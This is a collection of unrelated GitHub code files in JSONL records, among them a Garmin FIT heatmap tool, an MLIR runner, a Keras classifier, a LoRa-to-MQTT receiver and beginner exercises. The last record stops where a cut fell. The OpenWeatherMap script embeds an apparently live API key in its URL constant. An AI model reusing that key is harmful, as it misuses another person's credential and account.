+{"seq_id":"18335197570","text":"from typing import Optional\n\n\nclass ListNode:\n\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n\n\nclass Solution:\n\n    @staticmethod\n    def middle_node(head: Optional[ListNode]) -> ListNode:\n        nodes = [head]  # collect the nodes in a list so the middle one can be indexed\n        while nodes[-1].next:\n            nodes.append(nodes[-1].next)\n\n        return nodes[len(nodes)//2]\n\n\ns = Solution()\nfunc = s.middle_node\n","repo_name":"strecobyasha/do_not_look_inside","sub_path":"middle_node.py","file_name":"middle_node.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"13130330015","text":"import click\nfrom configparser import ConfigParser\nimport fitdecode\nimport os\n# from datetime import datetime\n\nparser = ConfigParser()\nparser.read('config.ini')\nAPI_KEY = parser.get('GOOGLE', 'API_KEY')\nINITIAL_LATITUDE = parser.get('MAP', 'LATITUDE')\nINITIAL_LONGITUDE = parser.get('MAP', 'LONGITUDE')\nINITIAL_ZOOM = parser.get('MAP', 'ZOOM')\n\n\n@click.command()\n@click.option(\"--output\", default=\"map\", help=\"Specify the name of the output file. Defaults to `map`\")\n@click.option(\"--input\", default=\"fit\", help=\"Specify an input folder. Defaults to `fit`\")\n@click.option(\"--filter\", default=None, help=\"Specify a filter type. Defaults to no filter\", type=click.Choice(['running', 'cycling', 'walking']))\n@click.option(\"--year\", default=None, help=\"Specify a year. 
Defaults to no year\", type=int, multiple=True)\n\ndef main(output, input, filter, year):\n points = load_points(input, filter, year)\n generate_html(points, output)\n\n\n# Convert Garmin time format to Python datetime - not needed anymore.\n\"\"\" \ndef convert_frame_datetime(frame_datetime):\n converted_frame_datetime = datetime.strptime(\n frame_datetime, \"%Y-%m-%d %H:%M:%S%z\")\n\n return converted_frame_datetime \n\"\"\"\n\n\n# Get fit file's created time\ndef get_fit_time(input_file):\n with fitdecode.FitReader(input_file) as fit_file:\n for frame in fit_file:\n if isinstance(frame, fitdecode.records.FitDataMessage):\n if frame.name == 'file_id':\n if frame.has_field('time_created'):\n # print(frame.get_value('time_created').year)\n x = frame.get_value('time_created')\n return x\n\n\ndef load_points(folder, filter, year):\n # Loads all fit files into a list of points\n coords = []\n\n # Loads files with progressbar\n print(f\"Loading files with type {filter} for {year}...\")\n with click.progressbar(os.listdir(folder)) as bar:\n for filename in bar:\n # Verify file is a fit file\n if (filename.lower().endswith(\".fit\")):\n fit_file = os.path.join(folder, filename)\n # Get fit file's created date\n fit_created_year = get_fit_time(fit_file).year\n # Only continue if year list is empty OR fit file's year is part of the year(s) you want to process\n if not year or fit_created_year in year:\n with fitdecode.FitReader(fit_file) as fit:\n for frame in fit:\n if isinstance(frame, fitdecode.records.FitDataMessage):\n # only pull 'record' frame - this is where coordinates are\n if frame.name == 'record':\n if frame.has_field('position_lat') and frame.has_field('position_long'):\n # Get Garmin Lat and Long from each frame\n # Convert Garmin GPS coordinates, calculcations based on this https://gis.stackexchange.com/questions/122186/convert-garmin-or-iphone-weird-gps-coordinates/368905#368905\n frame_lat = float(frame.get_value(\n 'position_lat')) / ((2**32)/360)\n frame_long = float(frame.get_value(\n 'position_long')) / ((2**32)/360)\n coords.append(\n [frame_lat, frame_long])\n\n return (coords)\n\n\ndef get_outline():\n \"\"\"Reads in the html outline file\"\"\"\n with open('map-outline.txt', 'r') as file:\n outline = file.read()\n return outline\n\n\ndef generate_html(points, file_out):\n \"\"\"Generates a new html file with points\"\"\"\n if not os.path.exists('output'):\n os.mkdir('output')\n f = open(f\"output/{file_out}.html\", \"w\")\n outline = get_outline()\n google_points = \",\\n\".join(\n [f\"new google.maps.LatLng({point[0]}, {point[1]})\" for point in points])\n updated_content = outline.replace(\"LIST_OF_POINTS\", google_points).replace(\"API_KEY\", API_KEY).replace(\n \"INIT_LATITUDE\", INITIAL_LATITUDE).replace(\"INIT_LONGITUDE\", INITIAL_LONGITUDE).replace(\"INIT_ZOOM\", INITIAL_ZOOM)\n f.write(updated_content)\n f.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"li4520/FIT-Heatmap","sub_path":"fit_heatmap.py","file_name":"fit_heatmap.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"5063950683","text":"# RUN: %PYTHON %s\nimport os\nimport ctypes\nimport numpy as np\n\nfrom hcl_mlir.ir import *\nfrom hcl_mlir.passmanager import *\nfrom hcl_mlir.execution_engine import *\nfrom hcl_mlir.runtime import *\n\nclass C128(ctypes.Structure):\n \"\"\"A ctype representation for MLIR's Double Complex.\"\"\"\n\n _fields_ = [(\"real\", ctypes.c_double), (\"imag\", 
ctypes.c_double)]\n\n\nclass C64(ctypes.Structure):\n \"\"\"A ctype representation for MLIR's Float Complex.\"\"\"\n\n _fields_ = [(\"real\", ctypes.c_float), (\"imag\", ctypes.c_float)]\n\n\nclass F16(ctypes.Structure):\n \"\"\"A ctype representation for MLIR's Float16.\"\"\"\n\n _fields_ = [(\"f16\", ctypes.c_int16)]\n\n\ndef to_numpy(array):\n \"\"\"Converts ctypes array back to numpy dtype array.\"\"\"\n if array.dtype == C128:\n return array.view(\"complex128\")\n if array.dtype == C64:\n return array.view(\"complex64\")\n if array.dtype == F16:\n return array.view(\"float16\")\n return array\n\n\ndef my_ranked_memref_to_numpy(ranked_memref):\n \"\"\"Converts ranked memrefs to numpy arrays.\"\"\"\n np_arr = np.ctypeslib.as_array(\n ranked_memref.aligned, shape=ranked_memref.shape\n )\n strided_arr = np.lib.stride_tricks.as_strided(\n np_arr,\n np.ctypeslib.as_array(ranked_memref.shape),\n np.ctypeslib.as_array(ranked_memref.strides) * np_arr.itemsize,\n )\n return to_numpy(strided_arr)\n\n\n\ndef lowerToLLVM(module):\n # pm = PassManager.parse(\n # \"builtin.module(lower-affine,convert-scf-to-cf,convert-arith-to-llvm,convert-memref-to-llvm,convert-func-to-llvm,convert-cf-to-llvm,reconcile-unrealized-casts)\")\n pm = PassManager.parse(\n \"builtin.module(\"\n \"convert-linalg-to-affine-loops,\"\n \"one-shot-bufferize,\"\n \"lower-affine,\"\n \"convert-scf-to-cf,\"\n \"convert-cf-to-llvm,\"\n \"convert-func-to-llvm,\"\n \"convert-arith-to-llvm,\"\n \"finalize-memref-to-llvm,\"\n \"reconcile-unrealized-casts\"\n \")\"\n )\n \n pm.run(module.operation)\n # module.dump()\n return module\n\n\ndef get_assembly(filename):\n with open(filename, \"r\") as f:\n code = f.read()\n return code\n\n\"\"\"\nAssumptions:\n1. returned values are moved to input arg list\n2. invoke entry point function is named \"top\"\n3. 
llvm.emit_c_interface is attached to the top function\n\"\"\"\ndef run_ir(ir_filename, input_args, output_args):\n code = get_assembly(os.path.join(os.path.dirname(\n os.path.abspath(__file__)), ir_filename))\n\n # Add shared library\n if os.getenv(\"LLVM_BUILD_DIR\") is not None:\n shared_libs = [\n os.path.join(os.getenv(\"LLVM_BUILD_DIR\"),\n 'lib', 'libmlir_runner_utils.so'),\n os.path.join(os.getenv(\"LLVM_BUILD_DIR\"),\n 'lib', 'libmlir_c_runner_utils.so')\n ]\n print(\"Got shared libs: {}\".format(shared_libs))\n else:\n print(\"LLVM_BUILD_DIR not set\")\n shared_libs = None\n\n input_memrefs = [ctypes.pointer(ctypes.pointer(get_ranked_memref_descriptor(arg))) for arg in input_args]\n # output_memrefs = [ctypes.pointer(ctypes.pointer(get_ranked_memref_descriptor(arg))) for arg in output_args]\n output_memrefs = [get_ranked_memref_descriptor(arg) for arg in output_args]\n # pack output memref into a struct with ctypes\n # first, make a struct with two fields: memref0, memref1\n class OutputStruct(ctypes.Structure):\n _fields_ = [(\"memref0\", output_memrefs[0].__class__), \\\n (\"memref1\", output_memrefs[1].__class__)]\n \n out_struct = OutputStruct()\n # assign the memref pointers to the struct\n out_struct.memref0 = output_memrefs[0]\n out_struct.memref1 = output_memrefs[1]\n # do a pointer of pointer of the struct\n output_memrefs = ctypes.pointer(ctypes.pointer(out_struct))\n\n with Context():\n module = Module.parse(code)\n lowered = lowerToLLVM(module)\n if shared_libs is not None:\n execution_engine = ExecutionEngine(\n lowered, opt_level=0, shared_libs=shared_libs)\n else:\n execution_engine = ExecutionEngine(lowered)\n execution_engine.invoke(\n \"kernel\", output_memrefs, *input_memrefs)\n \n res0 = my_ranked_memref_to_numpy(output_memrefs[0][0].memref0)\n res1 = my_ranked_memref_to_numpy(output_memrefs[0][0].memref1)\n\n print(res0)\n print(res1)\n\n\ndef test_multi_return():\n filename = \"./ir.mlir\"\n np_A = np.random.randint(0, 10, size=(10,)).astype(np.int32)\n np_B = np.random.randint(0, 10, size=(10,)).astype(np.int32)\n out_A = np.zeros_like(np_A).astype(np.int32)\n out_B = np.zeros_like(np_B).astype(np.int32)\n print(np_A)\n print(np_B)\n run_ir(filename, input_args=[np_A, np_B], output_args=[out_A, out_B])\n # print(out_A)\n # print(out_B)\n\n\nif __name__ == \"__main__\":\n test_multi_return()","repo_name":"zzzDavid/hcl-debug","sub_path":"multi-return/ir_runner.py","file_name":"ir_runner.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73801942590","text":"#ANS1\r\ntxt=str(input(\" \"))\r\ntxt1=txt[::-1]\r\nprint(txt1)\r\n\r\n\r\n\r\n#ANS2\r\na=int(input(\"range:\"))\r\nb=int(input(\"User Number:\"))\r\nfor i in range(a):\r\n if i%b==0:\r\n print(i)\r\n continue\r\n \r\n\r\n\r\n\r\n#ANS3\r\na = int(input(\"Enter the first length: \"))\r\nb = int(input(\"Enter the second length: \"))\r\nc = int(input(\"Enter the third length: \"))\r\nif (a + b > c) and (a + c > b) and (b + c > a):\r\n print(\"Yes\") \r\n s=(a+b+c)/2\r\n area=(s*(s-a)*(s-b)*(s-c))**0.5\r\n print('The area of the triangle is %0.2f' %area) \r\nelse:\r\n print(\"No\") \r\n \r\n \r\n \r\n \r\n#ANS4\r\nn=int(input(\"No. of Rows: \"))\r\nfor i in range(n):\r\n for j in range(i):\r\n print ('* ', end=\"\")\r\n print('')\r\n\r\nfor i in range(n,0,-1):\r\n for j in range(i):\r\n print('* ', end=\"\")\r\n print('')\r\n \r\n \r\n \r\n#ANS5\r\nn=int(input(\"No. 
of Rows: \"))\r\nx=ord(\"A\")\r\nfor i in range(n):\r\n for j in range(i+1):\r\n print(chr(x), end=\"\")\r\n x=x+1\r\n print('')\r\n\r\n\r\n\r\n#ANS6\r\nn=int(input(\"range:\"))\r\nfor number in range (n): \r\n if number > 1: \r\n for i in range (2, number): \r\n if (number % i) == 0: \r\n break \r\n else: \r\n print (number) \r\n\r\n\r\n\r\n#ANS7\r\nn=[]\r\nfor i in range(0,501,1):\r\n if i%11==0 and i%7==0:\r\n n.append(str(i))\r\nprint (n)\r\n\r\n\r\n#ANS8\r\nlist = []\r\nn = int(input(\"Enter number of elements : \"))\r\nfor i in range(0, n):\r\n x = int(input())\r\n \r\n list.append(x) \r\n \r\nprint(list)\r\n\r\n#a Positive Numbers\r\nfor i in list:\r\n if i>=0:\r\n print(i, \"is positive\")\r\n continue\r\n \r\n#b Negative Numbers\r\nfor i in list:\r\n if i<0:\r\n print(i,\"is negative\")\r\n continue\r\n\r\n#c Odd Numbers\r\nfor i in list:\r\n if i%2!=0:\r\n print(i,\"is Odd\")\r\n continue\r\n\r\n#d Even Numbers\r\nfor i in list:\r\n if i%2==0:\r\n print(i,\"is Ever\")\r\n continue\r\n \r\n#e Number of times each number occurs in the List \r\nfor i in list:\r\n a=list.count(i)\r\n print(f\"Count of {i}={a}\")\r\n continue\r\n \r\n \r\n\r\n#ANS9\r\nlist = []\r\nn = int(input(\"Enter number of elements : \"))\r\nfor i in range(0, n):\r\n q=str(input())\r\n \r\n list.append(q) \r\n \r\nprint(list)\r\nfor i in list:\r\n a=list.count(i)\r\n print(f\"Count of {i}={a}\")\r\n continue","repo_name":"BT22104052/ES1101","sub_path":"Assignment 5.py","file_name":"Assignment 5.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2596072215","text":"import os\n\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.layers import Dense, Dropout, GlobalAveragePooling2D\nfrom tensorflow.core.protobuf.config_pb2 import ConfigProto\nimport tensorflow.keras.layers as ly\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras import Sequential\nimport cv2\nimport numpy as np\nfrom tensorflow.python.client.session import InteractiveSession\n\nconfig = ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = InteractiveSession(config=config)\n\nbase_model = InceptionResNetV2(weights='imagenet', include_top=False, input_shape=(256, 256, 3))\nbase_model.trainable = False\n\nadd_model = Sequential()\nadd_model.add(base_model)\nadd_model.add(GlobalAveragePooling2D())\nadd_model.add(Dropout(0.25))\nadd_model.add(Dense(3,\n activation='softmax'))\n\nmodel = add_model\nmodel.compile(loss='sparse_categorical_crossentropy',\n optimizer=Adam(learning_rate=0.0035),\n metrics=['accuracy'])\n\n\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\nmodel.summary()\nmodel.load_weights('/home/edutech-pc06/PycharmProjects/OerAdap-Modulo-Imagenes/Level2 Illustration/Level3 Digital/custom_weights.hdf5')\n\n\ndef preprocess_image(directory):\n # Read image from directory\n img = cv2.imread(directory, cv2.IMREAD_COLOR)\n\n if img is not None:\n img = cv2.resize(src=img, dsize=(256, 256), interpolation=cv2.INTER_AREA)\n img = cv2.fastNlMeansDenoising(img, None, 10, 7, 21)\n img = img / 255\n return img\n else:\n pass\n\n\npredicted_map = {0: 'Animated illustration', 1: 'Logo', 2: 'Screenshot'}\n\nfiles = os.listdir('/home/edutech-pc06/PycharmProjects/OerAdap-Modulo-Imagenes/Level2 Illustration/Level3 Digital/test_images')\nfor file in files:\n preprocessed_image = 
preprocess_image(f'/home/edutech-pc06/PycharmProjects/OerAdap-Modulo-Imagenes/Level2 Illustration/Level3 Digital/test_images/{file}')\n    preprocessed_image = preprocessed_image.reshape(-1, 256, 256, 3)\n    print('Filename: ' + file + '\\t' + predicted_map.get(np.argmax(model.predict(preprocessed_image), axis=1)[0]))\n","repo_name":"EduTech-Erasmus-Project/OerAdap-Modulo-Imagenes","sub_path":"Level2 Illustration/Level3 Digital/test_weights.py","file_name":"test_weights.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"29189412123","text":"from mqtt import MQTTClient\r\nfrom network import WLAN\r\nimport os\r\nimport machine\r\nimport time\r\nfrom network import LoRa  # to manage the LoRa module\r\nimport socket \t\t\t# to send the frames\r\nimport pycom\t\t\t# disable the heartbeat blink (sleep better at night!)\r\nfrom struct import *\r\n\r\nuart = machine.UART(0, 115200)\r\nos.dupterm(uart)\r\n\r\npycom.heartbeat(False)\r\n\r\nlora = LoRa(mode=LoRa.LORA, region=LoRa.EU868, bandwidth=1,preamble=10, sf=12,tx_power=20,coding_rate=1)#\r\ns = socket.socket(socket.AF_LORA, socket.SOCK_RAW)  # define a raw LoRa network socket\r\n\r\n\r\nknown_nets = {\r\n    'wifilocal': {'pwd': 'PWD','wlan_config': ('192.168.x.x', '255.255.x.x', '192.168.x.x', '1.1.1.1')},\r\n    'hotspot': {'pwd': 'PWD'}\r\n}\r\n\r\nif machine.reset_cause() != machine.SOFT_RESET:\r\n    from network import WLAN\r\n    wlan = WLAN()\r\n    wlan.mode(WLAN.STA)\r\n    original_ssid = wlan.ssid()\r\n    original_auth = wlan.auth()\r\n\r\n    print(\"Scanning for known wifi nets\")\r\n    available_nets = wlan.scan()\r\n    nets = frozenset([e.ssid for e in available_nets])\r\n\r\n    known_nets_names = frozenset([key for key in known_nets])\r\n    net_to_use = list(nets & known_nets_names)\r\n    try:\r\n        net_to_use = net_to_use[0]\r\n        net_properties = known_nets[net_to_use]\r\n        pwd = net_properties['pwd']\r\n        sec = [e.sec for e in available_nets if e.ssid == net_to_use][0]\r\n        if 'wlan_config' in net_properties:\r\n            wlan.ifconfig(config=net_properties['wlan_config'])\r\n        wlan.connect(net_to_use, (sec, pwd), timeout=10000)\r\n        while not wlan.isconnected():\r\n            machine.idle() # save power while waiting\r\n        print(\"Connected to \"+net_to_use+\" with IP address:\" + wlan.ifconfig()[0])\r\n\r\n    except Exception as e:\r\n        print(\"Failed to connect to any known network, going into AP mode\")\r\n        wlan.init(mode=WLAN.AP, ssid=original_ssid, auth=original_auth, channel=6, antenna=WLAN.INT_ANT)\r\n\r\n# import network\r\n# server = network.Server()\r\n# server.deinit() # disable the server\r\n# server.init(login=('user', 'password'), timeout=600\r\n\r\nclient = MQTTClient(\"deviceid\", \"x.x.x.x\",user=\"xxxx\", password=\"xxx\", port=xxxx)\r\nclient.connect()\r\n\r\n\r\n\r\nclient.publish(topic=\"coordoner\", msg=\"lon,lat,rssi,snr\")\r\nprint(\"lon,lat,rssi,snr\")\r\nwhile True:\r\n    data=s.recv(16)  # fix the packet size!\r\n    try:\r\n        coordoner=unpack('ff',data)\r\n        # lon, lat, rssi, snr\r\n        data=str(coordoner[0])+\",\"+str(coordoner[1])+\",\"+str(lora.stats()[1])+\",\"+str(lora.stats()[2])\r\n        print(data)\r\n        client.publish(topic=\"coordoner\", msg=data)\r\n        time.sleep(1)\r\n    except Exception as e:\r\n        print(\"exception:\"+str(data))\r\n","repo_name":"megachonker/Lora-Plot","sub_path":"recepteur/boot.py","file_name":"boot.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} 
+{"seq_id":"7698367288","text":"from django.urls import path\nfrom . import views\nfrom .login_views import login\n\n\nurlpatterns = [\n path('', views.bot_start, name='bot_start'),\n # path('', Home.as_view(), name='home'),\n path('test/', views.test, name='test'),\n path('greet/', views.greet, name='greet'),\n path('chatbot/', views.chatbot, name='chatbot'),\n\n\n path('api/login', login),\n]\n","repo_name":"riteshsharthi/BOT","sub_path":"TataChatBot/chatroom/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"234096197","text":"from users.mixins import WriteCheckMixin\n\nfrom .models import TruckImage, TrailerImage, TruckDocument, TrailerDocument, \\\n CompanyDocument\nfrom .forms import TruckImageForm, TrailerImageForm, TruckDocumentForm, \\\n TrailerDocumentForm, CompanyDocumentForm\nfrom .mixins import ImageCreateView, ImageListView, DocumentCreateView, \\\n DocumentListView\nfrom invent.models import Truck, Trailer, Company\n\n\nclass TruckImageView(WriteCheckMixin, ImageCreateView):\n model = TruckImage\n form_class = TruckImageForm\n origin_model = Truck\n folder_name = 'trucks'\n\n\nclass TruckImageListView(WriteCheckMixin, ImageListView):\n model = TruckImage\n origin_model = Truck\n key_url = \"invent:truck\"\n\n def get_queryset(self):\n origin = self.get_origin()\n return origin.truckimage_set.all()\n\n\nclass TrailerImageView(WriteCheckMixin, ImageCreateView):\n model = TrailerImage\n form_class = TrailerImageForm\n origin_model = Trailer\n folder_name = 'trailers'\n\n\nclass TrailerImageListView(WriteCheckMixin, ImageListView):\n model = TrailerImage\n origin_model = Trailer\n key_url = \"invent:trailer\"\n\n def get_queryset(self):\n origin = self.get_origin()\n return origin.trailerimage_set.all()\n\n\nclass TruckDocumentView(WriteCheckMixin, DocumentCreateView):\n model = TruckDocument\n form_class = TruckDocumentForm\n origin_model = Truck\n folder_name = 'trucks'\n\n\nclass TruckDocumentListView(WriteCheckMixin, DocumentListView):\n model = TruckDocument\n origin_model = Truck\n key_url = \"invent:truck\"\n\n def get_queryset(self):\n origin = self.get_origin()\n return origin.truckdocument_set.all()\n\n\nclass TrailerDocumentView(WriteCheckMixin, DocumentCreateView):\n model = TrailerDocument\n form_class = TrailerDocumentForm\n origin_model = Trailer\n folder_name = 'trailers'\n\n\nclass TrailerDocumentListView(WriteCheckMixin, DocumentListView):\n model = TrailerDocument\n origin_model = Trailer\n key_url = \"invent:trailer\"\n\n def get_queryset(self):\n origin = self.get_origin()\n return origin.trailerdocument_set.all()\n\n\nclass CompanyDocumentView(WriteCheckMixin, DocumentCreateView):\n model = CompanyDocument\n form_class = CompanyDocumentForm\n origin_model = Company\n folder_name = 'companies'\n\n\nclass CompanyDocumentListView(WriteCheckMixin, DocumentListView):\n model = CompanyDocument\n origin_model = Company\n key_url = \"invent:company\"\n\n def get_queryset(self):\n origin = self.get_origin()\n return origin.companydocument_set.all()\n","repo_name":"gunnerson/tsm","sub_path":"docs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43214684859","text":"import requests\nimport json\n\n\nclass CallWeatherman:\n\n BASE_URL = \"http://api.openweathermap.org/data/2.5/weather?{}{}\"\n FUNCTION = 
\"id=5746545\"\n API_KEY = \"&APPID=7f283940189575de586b368bad666ed1\"\n\n def __init__(self):\n\n self.temperature = 0\n\n def execute(self):\n\n response = requests.get(self.BASE_URL.format(self.FUNCTION, self.API_KEY))\n if response.status_code != 200:\n # This means something went wrong.\n print('GET /tasks/ {}'.format(response.status_code))\n\n return_bin = b\"\"\n for response_part in response:\n return_bin += response_part\n\n self.find_temperature(return_bin)\n\n def find_temperature(self, json_object):\n\n weather_dict = json.loads(json_object.decode())\n kelvin = (weather_dict['main']['temp'])\n fahrenheit = (kelvin - 273.15) * 9/5 + 32\n fahrenheit_rounded = round(fahrenheit, 2)\n self.temperature = fahrenheit_rounded\n return fahrenheit_rounded\n\n\nif __name__ == \"__main__\":\n\n wet = CallWeatherman()\n wet.execute()\n","repo_name":"CommanderPaul/weather_api","sub_path":"call_weatherman.py","file_name":"call_weatherman.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"27292943387","text":"from time import time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nfrom sklearn.cluster import KMeans\nfrom sklearn.datasets import load_digits\nfrom sklearn.preprocessing import scale\n\nnp.random.seed()\ndigits = load_digits()\ndata = scale(digits.data)\n\nn_samples, n_features = data.shape\nn_digits = len(np.unique(digits.target))\nlabels = digits.target\n\nsample_size = 300\n\nprint(\"n_digits: %d, \\t n_samples: %d, \\t n_features %d\" %(n_digits, n_samples,n_features))\nprint(79 * '_')\nprint('% 9s' % 'init'' time inertia homo compl v-meas ARI silhouette')\n\ndef bench_k_means(estimator, name, data):\n t0 = time()\n estimator.fit(data)\n print('% 9s %.2fs %i %.3f %.3f %.3f %.3f %.3f'\n %(name, (time() - t0), estimator.inertia_,\n metrics.homogeneity_score(labels, estimator.labels_),\n metrics.completeness_score(labels, estimator.labels_),\n metrics.v_measure_score(labels, estimator.labels_),\n metrics.adjusted_rand_score(labels, estimator.labels_),\n metrics.silhouette_score(data, estimator.labels_,\n metric='euclidean',\n sample_size=sample_size)))\n","repo_name":"Hanuman26/DeepPy","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35264976115","text":"import json\nimport logging\nfrom pathlib import Path\n\nimport librosa\nimport numpy as np\nimport torch\nfrom scipy.signal import firwin, lfilter\nfrom soundfile import read\nfrom torch.utils import data\n\nlogger = logging.getLogger(__name__)\n\n\ndef read_wavfile(path):\n wav, _ = read(path)\n return wav.transpose()\n\n\nclass CEC1Dataset(data.Dataset):\n def __init__(\n self,\n scenes_folder,\n scenes_file,\n sample_rate,\n downsample_factor,\n wav_sample_len=None,\n wav_silence_len=2,\n num_channels=6,\n norm=False,\n testing=False,\n ):\n self.scenes_folder = scenes_folder\n self.sample_rate = sample_rate\n self.downsample_factor = downsample_factor\n self.wav_sample_len = wav_sample_len\n self.wav_silence_len = wav_silence_len\n self.num_channels = num_channels\n self.norm = norm\n self.testing = testing\n\n self.scene_list = []\n with open(scenes_file, encoding=\"utf-8\") as fp:\n scene_json = json.load(fp)\n if not testing:\n for scene in scene_json:\n self.scene_list.append(scene[\"scene\"])\n else:\n for scene in scene_json.keys():\n 
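# Added note: in the testing split the scenes JSON is a dict keyed by scene name, hence .keys() here.\n 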
self.scene_list.append(scene)\n\n if self.num_channels == 2:\n self.mixed_suffix = \"_mixed_CH1.wav\"\n self.target_suffix = \"_target_anechoic.wav\"\n elif self.num_channels == 6:\n self.mixed_suffix = [\"_mixed_CH1.wav\", \"_mixed_CH2.wav\", \"_mixed_CH3.wav\"]\n self.target_suffix = \"_target_anechoic.wav\"\n else:\n raise NotImplementedError\n\n self.lowpass_filter = firwin(\n 1025,\n self.sample_rate // (2 * self.downsample_factor),\n pass_zero=\"lowpass\",\n fs=self.sample_rate,\n )\n\n def wav_sample(self, x, y):\n \"\"\"\n A 2 second silence is in the beginning of clarity data\n Get rid of the silence segment in the beginning & sample a\n constant wav length for training.\n \"\"\"\n silence_len = int(self.wav_silence_len * self.sample_rate)\n x = x[:, silence_len:]\n y = y[:, silence_len:]\n\n wav_len = x.shape[1]\n sample_len = int(self.wav_sample_len * self.sample_rate)\n if wav_len > sample_len:\n start = np.random.randint(wav_len - sample_len)\n end = start + sample_len\n x = x[:, start:end]\n y = y[:, start:end]\n elif wav_len < sample_len:\n x = np.append(\n x, np.zeros([x.shape[1], sample_len - wav_len], dtype=np.float32)\n )\n y = np.append(\n y, np.zeros([x.shape[1], sample_len - wav_len], dtype=np.float32)\n )\n\n return x, y\n\n def lowpass_filtering(self, x):\n return lfilter(self.lowpass_filter, 1, x)\n\n def __getitem__(self, item):\n scenes_folder = Path(self.scenes_folder)\n if self.num_channels == 2:\n mixed = read_wavfile(\n scenes_folder / (self.scene_list[item] + self.mixed_suffix)\n )\n elif self.num_channels == 6:\n mixed = []\n for suffix in self.mixed_suffix:\n mixed.append(\n read_wavfile(scenes_folder / (self.scene_list[item] + suffix))\n )\n mixed = np.concatenate(mixed, axis=0)\n else:\n raise NotImplementedError\n target = None\n if not self.testing:\n target = read_wavfile(\n scenes_folder / (self.scene_list[item] + self.target_suffix)\n )\n if target.shape[1] > mixed.shape[1]:\n logging.warning(\n \"Target length is longer than mixed length. Truncating target.\"\n )\n target = target[:, : mixed.shape[1]]\n elif target.shape[1] < mixed.shape[1]:\n logging.warning(\n \"Target length is shorter than mixed length. 
Padding target.\"\n )\n target = np.pad(\n target,\n ((0, 0), (0, mixed.shape[1] - target.shape[1])),\n mode=\"constant\",\n )\n\n if self.sample_rate != 44100:\n mixed_resampled, target_resampled = [], []\n for i in range(mixed.shape[0]):\n mixed_resampled.append(\n librosa.resample(\n mixed[i], target_sr=44100, orig_sr=self.sample_rate\n )\n )\n mixed = np.array(mixed_resampled)\n if target is not None:\n for i in range(target.shape[0]):\n target_resampled.append(\n librosa.resample(\n target[i], target_sr=44100, orig_sr=self.sample_rate\n )\n )\n target = np.array(target_resampled)\n\n if self.wav_sample_len is not None:\n mixed, target = self.wav_sample(mixed, target)\n\n if self.norm:\n mixed_max = np.max(np.abs(mixed))\n mixed = mixed / mixed_max\n if target is not None:\n target = target / mixed_max\n\n if not self.testing:\n return_data = (\n torch.tensor(mixed, dtype=torch.float32),\n torch.tensor(target, dtype=torch.float32),\n )\n else:\n return_data = (\n torch.tensor(mixed, dtype=torch.float32),\n self.scene_list[item],\n )\n\n return return_data\n\n def __len__(self):\n return len(self.scene_list)\n","repo_name":"claritychallenge/clarity","sub_path":"clarity/dataset/cec1_dataset.py","file_name":"cec1_dataset.py","file_ext":"py","file_size_in_byte":5709,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"60"} +{"seq_id":"40415597121","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn\nfrom sklearn.datasets import make_classification\nfrom sklearn.neighbors import NearestCentroid\n\ndef adjR(x, y, degree):\n results = {}\n coeffs = np.polyfit(x, y, degree)\n p = np.poly1d(coeffs)\n yhat = p(x)\n ybar = np.sum(y)/len(y)\n ssreg = np.sum((yhat-ybar)**2)\n sstot = np.sum((y - ybar)**2)\n results['r_squared'] = 1- (((1-(ssreg/sstot))*(len(y)-1))/(len(y)-degree-1))\n\n return results\n\nif __name__ == '__main__':\n longleyData = pd.read_csv('longley.csv')\n\n print(longleyData)\n employ = 'Employed'\n gnp = 'GNP'\n\n longleyData.plot.scatter(x=employ,\n y=gnp,\n c='Red')\n plt.show()\n\n employData = longleyData[employ]\n gnpdata = longleyData[gnp]\n\n pz1 = np.poly1d(np.polyfit(employData, gnpdata, 1))\n pz2 = np.poly1d(np.polyfit(employData, gnpdata, 2))\n pz3 = np.poly1d(np.polyfit(employData, gnpdata, 3))\n pz4 = np.poly1d(np.polyfit(employData, gnpdata, 4))\n pz5 = np.poly1d(np.polyfit(employData, gnpdata, 5))\n pz10 = np.poly1d(np.polyfit(employData, gnpdata, 10))\n\n xp = np.linspace(min(employData), max(employData))\n plt.xlabel('Employed')\n plt.ylabel('GNP')\n _ = plt.plot(employData, gnpdata, '.', xp, pz4(xp), '-', xp)\n plt.xlim(min(employData) - 5, max(employData) + 5)\n plt.ylim(min(gnpdata) - 10, max(gnpdata) + 10)\n plt.show()\n\n\n plt.plot(xp, pz1(xp), color='green')\n plt.plot(xp, pz2(xp), color='blue')\n plt.plot(xp, pz3(xp), color='red')\n plt.plot(xp, pz4(xp), 